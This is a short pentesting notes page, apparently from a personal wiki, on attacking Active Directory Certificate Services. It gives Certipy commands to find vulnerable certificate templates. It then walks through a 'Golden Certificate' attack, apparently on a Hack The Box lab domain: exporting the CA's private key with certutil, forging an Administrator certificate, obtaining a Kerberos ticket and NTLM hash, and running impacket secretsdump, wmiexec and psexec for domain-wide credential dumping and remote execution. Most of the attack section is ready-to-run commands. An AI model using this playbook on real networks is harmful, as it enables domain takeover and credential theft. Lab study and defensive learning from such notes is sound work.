TerminalCode

AD Certificates

See HERE.

A CA (Certification Authority) is part of the Active Directory Certificate Services (AD CS).

A CA is installed when the organization wants to use:

  • Authentication via certificates (Kerberos authentication with certificate (PKINIT) instead of using passwords/hashes)

  • Smart cards, VPN certificates, corporate Wi-Fi

  • Single Sign-On with certificates

  • Or when certificates are needed for machines/users/services

Identification

Use Certipy for enumeration and identifying vulnerable templates.

certipy find -u user -p pass -dc-ip 10.10.10.1 -stdout
certipy find -vulnerable -u <USER>@<DOMAIN> -p <PASSWORD> -dc-ip <DC> -stdout

Attacks

Golden Certificate

If you compromise the CA (obtain its .pfx), you can:

  • Sign a certificate for Administrator

  • Use it to obtain a TGT via PKINIT

  • Access the domain as if you were him

If you have read access to the disk, from the Windows victim:

certutil -store My
# find "Certificate Type: CA" and note the "Serial Number" or "Subject"

Obtain its .pfx

certutil -exportPFX My "<Serial_Number>" .\ca.pfx

Use Certipy from linux to craft Golden Certificate.

Always use sudo ntpdate <DC_IP> before.

# Generate a .pfx file signed by your compromised CA.
certipy forge -ca-pfx ca.pfx -upn Administrator@certificate.htb -subject 'CN=ADMINISTRATOR,CN=USERS,DC=CERTIFICATE,DC=HTB' -out adm_cert.pfx
# Authenticate with the certificate you created (Kerberos + PKINIT) and get TGT (.ccache file) and NTLM HASH!
certipy auth -pfx adm_cert.pfx -dc-ip <IP_DC>
# Use the .ccache ticket
export KRB5CCNAME=administrator.ccache
impacket-secretsdump -k -no-pass -target-ip <DC_IP> -dc-ip <DC_IP> certificate.htb/Administrator@DC01.certificate.htb
impacket-smbclient -k -no-pass -target-ip <DC_IP> -dc-ip <DC_IP> certificate.htb/Administrator@DC01.certificate.htb
impacket-wmiexec -k -no-pass -target-ip <DC_IP> -dc-ip <DC_IP> certificate.htb/Administrator@DC01.certificate.htb
impacket-psexec -k -no-pass -target-ip <DC_IP> -dc-ip <DC_IP> certificate.htb/Administrator@DC01.certificate.htb
...

PERSIST

Account Persistance.

ESC

Domain Escalation. (see also here)

DPERSIST

Domain Persistance

THEFT

Certificate Theft

Last updated

Was this helpful?